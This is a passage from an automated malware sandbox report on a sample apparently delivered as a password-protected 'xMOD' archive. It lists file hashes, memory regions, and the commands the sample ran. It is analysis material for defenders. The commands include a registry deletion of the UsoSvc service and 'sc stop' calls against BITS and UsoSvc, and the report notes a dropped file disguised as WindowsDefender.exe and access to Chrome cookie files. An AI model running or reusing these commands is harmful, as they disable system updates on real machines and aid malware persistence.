C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f1⤵
- Modifies registry key
-
C:\Windows\system32\sc.exesc stop bits1⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Windows\services.exeFilesize
2.0MB
MD534a91a205cbdf47dea9feac116611310
SHA1e41c185ab80f0e159daf2b81e817daff16f2eda6
SHA256dba6bf07d0b8944d8c58367d86c55ece1a4687e8a2b7be5d700f6d508c72a37c
SHA5128826cb3d89d03750da3ffaa4eccfb6995545b54fbb3615f15d2114f1eea6bbb1b330ec1d209d95596e132f070efda7fb0285e621f639c1cd5fd0164a28f7ae30
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\CookiesFilesize
56KB
MD5db976d216180252947220be18470ca36
SHA15bf37b90e102587eacc3ecaec2c4bae20289f090
SHA256dc66e6f2e478ec3bbfd8edb3a216177758b4e20ff8494697c4ae726c78f4b6a3
SHA512194f718117245cd16feb1f669cd76f780212bb4353fc53aadb554ec58ac4320585c14476b4dc1609e99d62b461a162769ed141b2a55d45d1feb463244948c3c9
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local StateFilesize
189KB
MD59ab18cf2a11a594ed2edc9e689dc43d7
SHA1119ab095b6acf0c470e4b92bb320231efa520256
SHA2566b4cd0a18d44a21e4d4f0a3cc4e7362e6b2c4bfe4d4513a5b5f0979966f038df
SHA512269f9c501e7686da710525d79ff6dc9646808be454669e024b0d38b03f34268617035bb2e2b2568e14994a201438775ce307cad58674bb6bac9635c5b752e25f
-
C:\Users\Admin\AppData\Local\Temp\7zO0E7DCB17\Loader.exeFilesize
1.3MB
MD56f20d2168a9a0ab5eb17d69c0b9c057a
SHA164d19ccab5b0beb90ea1504799fc257d0f2e95c8
SHA256157daf85b76555fb1d668880c0d436d1dc0b914da3e2e1057ceb6f2086574915
SHA512107a00df2dd5f75d73f9c5b852d079d26ffab2b7329963357c3c2d2234498787aa1d349365f2c93235e7287ace5a3f4a54b5314b8365e6a04b935f7bdda6be63
-
C:\Users\Admin\AppData\Local\Temp\7zO0E7DCB17\Loader.exeFilesize
1.3MB
MD56f20d2168a9a0ab5eb17d69c0b9c057a
SHA164d19ccab5b0beb90ea1504799fc257d0f2e95c8
SHA256157daf85b76555fb1d668880c0d436d1dc0b914da3e2e1057ceb6f2086574915
SHA512107a00df2dd5f75d73f9c5b852d079d26ffab2b7329963357c3c2d2234498787aa1d349365f2c93235e7287ace5a3f4a54b5314b8365e6a04b935f7bdda6be63
-
C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exeFilesize
2.0MB
MD534a91a205cbdf47dea9feac116611310
SHA1e41c185ab80f0e159daf2b81e817daff16f2eda6
SHA256dba6bf07d0b8944d8c58367d86c55ece1a4687e8a2b7be5d700f6d508c72a37c
SHA5128826cb3d89d03750da3ffaa4eccfb6995545b54fbb3615f15d2114f1eea6bbb1b330ec1d209d95596e132f070efda7fb0285e621f639c1cd5fd0164a28f7ae30
-
C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exeFilesize
2.0MB
MD534a91a205cbdf47dea9feac116611310
SHA1e41c185ab80f0e159daf2b81e817daff16f2eda6
SHA256dba6bf07d0b8944d8c58367d86c55ece1a4687e8a2b7be5d700f6d508c72a37c
SHA5128826cb3d89d03750da3ffaa4eccfb6995545b54fbb3615f15d2114f1eea6bbb1b330ec1d209d95596e132f070efda7fb0285e621f639c1cd5fd0164a28f7ae30
-
C:\Users\Admin\Downloads\xMOD v4.7 (PASS 123).rarFilesize
1.7MB
MD5fadee4c0867a3f3a421f823719a4c650
SHA1219ad2887a51b5b5635a257de7eb8d72532b4d9d
SHA2565de6d3b09065c6354facd498284eaeaf7c1213b5a2dad3a09d22bc2732af0cde
SHA512988756a1c0e981348e15c8be111872798af9001c1a83338bd0d05e1368e8b10017b8102709030fa89e311d5ed1ccb3bb79b8e9b62df5f630998bca6b5505625b
-
\??\pipe\crashpad_2768_GZDGWUHGQBKSYJZQMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/8-178-0x0000000000000000-mapping.dmp
-
memory/392-191-0x0000000000000000-mapping.dmp
-
memory/632-161-0x000001E28C280000-0x000001E28C45D000-memory.dmpFilesize
1.9MB
-
memory/632-162-0x000001E28E090000-0x000001E28EB51000-memory.dmpFilesize
10.8MB
-
memory/852-189-0x0000000000000000-mapping.dmp
-
memory/1492-193-0x0000000000000000-mapping.dmp
-
memory/1876-176-0x0000000000000000-mapping.dmp
-
memory/1928-132-0x0000000000000000-mapping.dmp
-
memory/2040-177-0x0000000000000000-mapping.dmp
-
memory/2180-185-0x0000000000000000-mapping.dmp
-
memory/2268-183-0x0000000000000000-mapping.dmp
-
memory/2268-213-0x0000000000000000-mapping.dmp
-
memory/2892-184-0x0000000000000000-mapping.dmp
-
memory/3292-221-0x0000000000000000-mapping.dmp
-
memory/3400-220-0x0000000000000000-mapping.dmp
-
memory/3684-225-0x0000000000000000-mapping.dmp
-
memory/3684-188-0x0000000000000000-mapping.dmp
-
memory/3780-181-0x0000000000000000-mapping.dmp
-
memory/3780-214-0x0000000000000000-mapping.dmp
-
memory/3952-195-0x000001F8A9430000-0x000001F8A9EF1000-memory.dmpFilesize
10.8MB
-
memory/3952-222-0x000001F8C2A00000-0x000001F8C2A12000-memory.dmpFilesize
72KB
-
memory/3992-212-0x0000000000000000-mapping.dmp
-
memory/3992-182-0x0000000000000000-mapping.dmp
-
memory/4100-207-0x0000000000000000-mapping.dmp
-
memory/4136-231-0x0000000000000000-mapping.dmp
-
memory/4152-190-0x0000000000000000-mapping.dmp
-
memory/4156-227-0x0000000000000000-mapping.dmp
-
memory/4288-187-0x0000000000000000-mapping.dmp
-
memory/4288-224-0x0000000000000000-mapping.dmp
-
memory/4320-206-0x0000000000000000-mapping.dmp
-
memory/4364-205-0x0000000000000000-mapping.dmp
-
memory/4412-186-0x0000000000000000-mapping.dmp
-
memory/4624-228-0x0000000000000000-mapping.dmp
-
memory/4920-226-0x0000000000000000-mapping.dmp
-
memory/4992-215-0x0000000000000000-mapping.dmp
-
memory/5000-165-0x0000000000000000-mapping.dmp
-
memory/5040-233-0x0000000000000000-mapping.dmp
-
memory/5060-172-0x0000000000000000-mapping.dmp
-
memory/5084-175-0x0000000000000000-mapping.dmp
-
memory/5116-217-0x0000000000401BEA-mapping.dmp
-
memory/5116-216-0x0000000000400000-0x000000000040C000-memory.dmpFilesize
48KB
-
memory/5116-219-0x0000000000400000-0x000000000040C000-memory.dmpFilesize
48KB
-
memory/5124-167-0x0000000000000000-mapping.dmp
-
memory/5136-223-0x0000000000000000-mapping.dmp
-
memory/5200-166-0x0000000000000000-mapping.dmp
-
memory/5212-209-0x0000000000000000-mapping.dmp
-
memory/5220-211-0x0000000000000000-mapping.dmp
-
memory/5228-180-0x0000000000000000-mapping.dmp
-
memory/5240-210-0x0000000000000000-mapping.dmp
-
memory/5260-208-0x0000000000000000-mapping.dmp
-
memory/5264-149-0x0000000006420000-0x0000000006486000-memory.dmpFilesize
408KB
-
memory/5264-146-0x0000000005F80000-0x0000000006012000-memory.dmpFilesize
584KB
-
memory/5264-154-0x0000000006ED0000-0x0000000006F20000-memory.dmpFilesize
320KB
-
memory/5264-143-0x0000000005530000-0x000000000563A000-memory.dmpFilesize
1.0MB
-
memory/5264-145-0x0000000006530000-0x0000000006AD4000-memory.dmpFilesize
5.6MB
-
memory/5264-142-0x0000000005400000-0x0000000005412000-memory.dmpFilesize
72KB
-
memory/5264-141-0x0000000005960000-0x0000000005F78000-memory.dmpFilesize
6.1MB
-
memory/5264-135-0x0000000000000000-mapping.dmp
-
memory/5264-147-0x00000000058D0000-0x0000000005946000-memory.dmpFilesize
472KB
-
memory/5264-148-0x00000000060A0000-0x00000000060BE000-memory.dmpFilesize
120KB
-
memory/5264-144-0x0000000005480000-0x00000000054BC000-memory.dmpFilesize
240KB
-
memory/5264-136-0x0000000000400000-0x0000000000420000-memory.dmpFilesize
128KB
-
memory/5264-152-0x00000000076B0000-0x0000000007BDC000-memory.dmpFilesize
5.2MB
-
memory/5264-151-0x0000000006FB0000-0x0000000007172000-memory.dmpFilesize
1.8MB
-
memory/5320-179-0x0000000000000000-mapping.dmp
-
memory/5388-232-0x0000000000000000-mapping.dmp
-
memory/5492-163-0x000001FFA9390000-0x000001FFA9E51000-memory.dmpFilesize
10.8MB
-
memory/5492-160-0x000001FFA9F70000-0x000001FFA9F92000-memory.dmpFilesize
136KB
-
memory/5492-159-0x0000000000000000-mapping.dmp
-
memory/5500-158-0x0000000000000000-mapping.dmp
-
memory/5652-229-0x0000000000000000-mapping.dmp
-
memory/5892-164-0x0000000000000000-mapping.dmp
-
memory/5900-171-0x0000000000000000-mapping.dmp
-
memory/5924-174-0x0000000000000000-mapping.dmp
-
memory/5924-230-0x0000000000000000-mapping.dmp
-
memory/5944-168-0x0000000000000000-mapping.dmp
-
memory/5952-173-0x0000000000000000-mapping.dmp
-
memory/5956-169-0x0000000000000000-mapping.dmp
-
memory/5968-199-0x00000210EFD70000-0x00000210EFD8C000-memory.dmpFilesize
112KB
-
memory/5968-194-0x0000000000000000-mapping.dmp
-
memory/5968-196-0x00000210EE8F0000-0x00000210EF3B1000-memory.dmpFilesize
10.8MB
-
memory/5968-197-0x00000210EFB20000-0x00000210EFB3C000-memory.dmpFilesize
112KB
-
memory/5968-198-0x00000210EFC00000-0x00000210EFC0A000-memory.dmpFilesize
40KB
-
memory/5968-202-0x00000210EFD60000-0x00000210EFD68000-memory.dmpFilesize
32KB
-
memory/5968-200-0x00000210EFD50000-0x00000210EFD5A000-memory.dmpFilesize
40KB
-
memory/5968-201-0x00000210EFDB0000-0x00000210EFDCA000-memory.dmpFilesize
104KB
-
memory/5968-203-0x00000210EFD90000-0x00000210EFD96000-memory.dmpFilesize
24KB
-
memory/5968-204-0x00000210EFDA0000-0x00000210EFDAA000-memory.dmpFilesize
40KB
-
memory/6000-155-0x0000000000000000-mapping.dmp
-
memory/6108-170-0x0000000000000000-mapping.dmp